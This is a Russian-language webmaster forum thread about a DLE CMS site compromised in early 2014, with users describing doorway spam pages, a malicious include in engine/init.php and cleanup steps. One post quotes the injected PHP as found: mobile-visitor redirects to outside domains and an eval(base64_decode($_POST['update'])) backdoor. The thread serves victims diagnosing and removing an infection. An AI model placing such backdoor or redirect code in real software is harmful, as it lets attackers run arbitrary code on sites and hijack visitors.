Вирус на сайте cms dle

goliafz
На сайте с 16.07.2008
Offline
94
#591

Сегодня в гугл вебмастер увидел такое сообщение:

vBulletin Update Available

As of the last crawl of your website, you appear to be running vBulletin 3. One or more of the URLs found were:

http://site.ru/index.php?do=2-sim-karti-soni-eriksona
http://site.ru/index.php?do=bankovskaya-karta-aeroflota
http://site.ru/index.php?do=belgiya-karta-belgii


Google recommends that you update to the latest release. Older or unpatched software may be vulnerable to hacking or malware that can hurt your users. To download the latest release, visit the vBulletin download page. If you have already updated to the latest version of vBulletin, please disregard this message.

If you have any additional questions about why you are receiving this message, Google has provided more background information in a blog post about this subject.

У меня таких ссылок просто нет на сайте. Перехожу по ссылкам. Вижу фейковый форум. Как будто мой. Во 2 посте ссылка СКАЧАТЬ и перенаправляет на:

http://fi1luesfour.h6pt.net.ua/?r=1032&q=2%20%F1%E8%EC%20%EA%E0%F0%F2%FB%20%F1%EE%ED%E8%20%FD%F0%E8%EA%F1%EE%ED%E0

Ссылок ведущих с моего сайта на эту байду просто нет. Видимо взломали. Только каким образом? В базе данных ничего такого нет.

Может кто уже столкнулся с похожим?

---------- Добавлено 17.01.2014 в 23:36 ----------

Таки нашел уже что случилось. Новый вид вируса на DLE. По снимкам появился на сервере 9 января 2014 года.

Закачивает на сервер папку.

site.ru\engine\editor\jscripts\tiny_mce\plugins\insertdatetime\jquery\

Буду искать где прописалась эта штука. По крайней мере нашел в engine\init.php. Там инклюд на этот плагин.

include '/var/www/54545454/data/www/site.ru/engine/editor/jscripts/tiny_mce/plugins/insertdatetime/jquery/jquery.php';

Появляется папка jquery. В ней куча файлов. На данный момент у меня в гугле находится больше 3000 лишних страниц, которые не соответсвуют моему сайту.

R
На сайте с 24.01.2008
Offline
180
#592
goliafz:
Сегодня в гугл вебмастер увидел такое сообщение:

Появляется папка jquery. В ней куча файлов. На данный момент у меня в гугле находится больше 3000 лишних страниц, которые не соответсвуют моему сайту.

Все очень просто, залили вам доров, рекомендую проверять не только на доры ваши сайты, так же на шеллы и сам хостинг.

Удаление вирусов с сайта, защита сайта, Гарантия! ( /ru/forum/999073 ) -> топик на маулталк ( http://www.maultalk.com/topic113834s0.html ) -> Топик в сапе ( http://forum.sape.ru/showthread.php?t=79363 ). TELEGRAM - https://t.me/Doktorsaitov
Настенька1
На сайте с 20.06.2013
Offline
11
#593
vip-moto:
О вам льет шелл тот же человек что и мне)))

гляньте еще тут /engine/init.php где то в середине у меня туда же залил.
Щас вот поставил заплатки с сайта Dle news, сменил пароли. Вот сижу жду пока обьявится. Еще прогоните shelldetect мне посоветовали, через него нашел где еще эта зараза.

Ребятки помогите пожалуйста, у меня вот тоже такая проблема, нашла по вашей подсказке

в файле /engine/init.php этот код, найти нашла, а что с ним делать не знаю, как его отредактировать чтобы не повредить сайт?

А еще может еще где, в каком файле могут быть ?


$iphone = strpos($_SERVER['HTTP_USER_AGENT'],"iPhone");
$android = strpos($_SERVER['HTTP_USER_AGENT'],"Android");
$palmpre = strpos($_SERVER['HTTP_USER_AGENT'],"webOS");
$berry = strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry");
$ipod = strpos($_SERVER['HTTP_USER_AGENT'],"iPod");

if ($iphone || $android || $palmpre || $ipod || $berry === true) {
header('Location: http://statuses.ws/');
}if (strpos($_SERVER['HTTP_USER_AGENT'],"iPhone") || strpos($_SERVER['HTTP_USER_AGENT'],"Android") || strpos($_SERVER['HTTP_USER_AGENT'],"webOS") || strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry") || strpos($_SERVER['HTTP_USER_AGENT'],"iPod")) header('Location: http://googlecount.ws/');
if(!empty($_POST['update'])) eval(base64_decode($_POST['update']));if (strpos($_SERVER['HTTP_USER_AGENT'],"iPhone") || strpos($_SERVER['HTTP_USER_AGENT'],"Android") || strpos($_SERVER['HTTP_USER_AGENT'],"webOS") || strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry") || strpos($_SERVER['HTTP_USER_AGENT'],"iPod")) header('Location: http://getinternet.ws/');
if(!empty($_POST['update'])) eval(base64_decode($_POST['update']));$category_skin = "";
Копирайтинг, рерайтинг, приемлемые цены, добрым людям)), хорошие скидки))
Настенька1
На сайте с 20.06.2013
Offline
11
#594

Проблему решила, следующим образом в этих 2х файлах был вредоносный код

engine/engine.php

engine/int.php

скачала такую же версию движка и перекинула эти файлы!!!

Все работает)))))))

Во всяком случи у меня.

K5
На сайте с 21.07.2010
Offline
209
#595

Настенька1, дырки скорее всего не закрыли, значит появится снова, да и следы от statuses.ws в 5и файлах убирать надо

аська 45два48499два записки на работе (http://memoryhigh.ru) помогу с сайтом, удалю вирусы, настрою впс -> отзывы ТУТ (/ru/forum/836248) и ТАМ (http://www.maultalk.com/topic140187.html) !!!всегда проверяйте данные людей, которые сами пишут вам в аську или скайп!!!
Настенька1
На сайте с 20.06.2013
Offline
11
#596
kgtu5:
Настенька1, дырки скорее всего не закрыли, значит появится снова, да и следы от statuses.ws в 5и файлах убирать надо

Сможете помочь с этим, объясним по подробней??))

Den73
На сайте с 26.06.2010
Offline
523
#597
Настенька1:
Сможете помочь с этим, объясним по подробней??))

если есть уязвимость в скриптах то удаление последствий взлома не поможет, через какое то время опять будут проблемы.

нужен комплекс мер.

Настенька1
На сайте с 20.06.2013
Offline
11
#598
Den73:
если есть уязвимость в скриптах то удаление последствий взлома не поможет, через какое то время опять будут проблемы.

нужен комплекс мер.

Вы знаете в каком порядке и что нужно делать,буду признательна если поможете..??

Den73
На сайте с 26.06.2010
Offline
523
#599
Настенька1:
Вы знаете в каком порядке и что нужно делать,буду признательна если поможете..??

знаю, но к сожалению платно

G-and-Y
На сайте с 29.06.2013
Offline
156
#600

Да залейте движок наново шаблон и модули если есть перенесите да и все, можно еще хостеру написать что б у себя проверил.

Абузо-устойчивые впс в Нидерландах от 5$/мес (https://cp.inferno.name/aff.php?aff=2991)

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий